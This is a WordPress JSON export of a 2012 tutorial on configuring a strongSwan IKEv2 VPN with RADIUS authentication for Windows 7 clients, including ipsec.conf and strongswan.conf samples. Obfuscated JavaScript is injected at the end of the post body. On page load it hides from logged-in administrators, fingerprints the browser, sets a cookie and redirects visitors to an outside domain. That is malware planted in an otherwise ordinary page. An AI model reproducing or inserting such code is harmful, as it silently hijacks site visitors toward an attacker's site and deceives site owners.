{"id":635,"date":"2012-06-08T16:37:22","date_gmt":"2012-06-08T08:37:22","guid":{"rendered":"http:\/\/www.q-station.net\/kb\/?p=635"},"modified":"2012-06-08T16:37:22","modified_gmt":"2012-06-08T08:37:22","slug":"strongwan-ikev2-vpn-for-windows-7","status":"publish","type":"post","link":"https:\/\/kb.q-station.net\/index.php\/2012\/06\/08\/strongwan-ikev2-vpn-for-windows-7\/","title":{"rendered":"Strongwan IKEv2 VPN for Windows 7"},"content":{"rendered":"<p>We will build a IKEv2 VPN for Windows 7 using strongSwan and client authenticate itself using MSCHAPv2.<br \/>\n<!--more--><\/p>\n<h1>Software<\/h1>\n<ul>\n<li>Slackware 13.37<\/li>\n<li>strongsWan<\/li>\n<li>Freeradius<\/li>\n<li>samba &#038; ldap<\/li>\n<\/ul>\n<h1>Infrastructure Design<\/h1>\n<p>Simply, leftsubnet, whole private network, will be use whole 192.168.0.0\/16 block and rightsubnet, all IKEv2 road-warrior, will be assign 192.168.76.0\/22.<\/p>\n<h1>strongSwan<\/h1>\n<h2>Installation<\/h2>\n<p><a href=\"http:\/\/www.q-station.net\/kb\/index.php\/2012\/06\/05\/linux-l2tpipsec-vpn-server\/\" title=\"Linux L2TP\/IPsec VPN server\">Refer this post.<\/a><\/p>\n<h2>Configuration<\/h2>\n<h3>\/usr\/local\/strongswan\/etc\/ipsec.conf<\/h3>\n<pre>\r\n\r\nconfig setup\r\n    nat_traversal=yes\r\n    # virtual_private=%v4:10.0.0.0\/8,%v4:192.168.0.0\/16,%v4:172.16.0.0\/12\r\n    \r\nconn IPSec-IKEv2\r\n    keyexchange=ikev2\r\n    auto=add\r\n    left=%defaultroute\r\n    leftauth=pubkey   \r\n    leftcert=\/usr\/local\/strongswan\/etc\/duo-cert.pem         \r\n    right=%any\r\n    rightauth=eap-radius\r\n    rightsendcert=never   \r\n    eap_identity=%any\r\n    ike=aes256-sha1-modp1024!\r\n    esp=aes256-sha1! \r\n    dpdaction=clear\r\n    dpddelay=300s\r\n    rightsourceip=192.168.76.0\/22\r\n    # rightsourceip=%dhcp\r\n    leftsubnet=192.168.0.0\/16 \r\n    # leftsourceip=%config\r\n<\/pre>\n<p><strong>Window will narrow down the traffic thru VPN as the IP range defined in the leftsubnet.  To let your gateway route all traffic for Windows, you could use 0.0.0.0\/0<\/strong><\/p>\n<h3>\/usr\/local\/strongswan\/etc\/strongswan.conf<\/h3>\n<p>In plugin session,<\/p>\n<pre>\r\ncharon {\r\n   dns1 = 192.168.1.1\r\n   nbns1 = 192.168.1.1\r\n\r\n   threads = 16\r\n\r\n   plugins {\r\n\r\n      sql {\r\n          # loglevel to log into sql database\r\n          loglevel = -1\r\n\r\n          # URI to the database\r\n          # database = sqlite:\/\/\/path\/to\/file.db\r\n          # database = mysql:\/\/user:password@localhost\/database\r\n      }\r\n        \r\n#    dhcp {\r\n#      server = 192.168.1.1\r\n#     }\r\n        \r\n    eap-radius {\r\n       servers {\r\n          vpnserver {\r\n             secret = xxxxxxxx\r\n             address = 127.0.0.1\r\n          }\r\n       }\r\n    }\r\n  }\r\n}\r\n\r\npluto { \r\n                \r\n}\r\n                      \r\nlibstrongswan {\r\n                        \r\n        #  set to no, the DH exponent size is optimized\r\n        #  dh_exponent_ansi_x9_42 = no\r\n}\r\n<\/pre>\n<h1>Windows client<\/h1>\n<p>Install &#038; trust the gateway cert issuer in Windows.<br \/>\n  <script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We will build a IKEv2 VPN for Windows 7 using strongSwan and client authenticate itself using MSCHAPv2.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[27,8],"tags":[75,74,63,60],"_links":{"self":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/635"}],"collection":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/comments?post=635"}],"version-history":[{"count":8,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/635\/revisions"}],"predecessor-version":[{"id":644,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/635\/revisions\/644"}],"wp:attachment":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/media?parent=635"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/categories?post=635"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/tags?post=635"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}